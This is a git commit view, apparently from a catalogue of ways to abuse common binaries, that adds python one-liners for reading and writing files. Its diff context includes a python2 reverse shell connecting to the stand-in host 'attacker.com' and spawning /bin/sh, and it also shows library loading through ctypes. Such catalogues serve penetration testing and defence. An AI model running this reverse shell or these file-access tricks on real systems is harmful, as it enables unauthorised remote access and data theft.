Add read and write to python and ruby

This commit is contained in:
Emilio Pinna
2018-05-28 18:25:55 +01:00
committed by Andrea Cardaci
parent 66b617c955
commit ee57eeba90
3 changed files with 12 additions and 0 deletions

View File

@@ -28,6 +28,10 @@ functions:
export RHOST=attacker.com
export RPORT=12345
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
file-read:
- code: python2 -c 'open("file_to_read").read()'
file-write:
- code: python2 -c 'open("file_to_write","w+").write("data")'
load-library:
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
---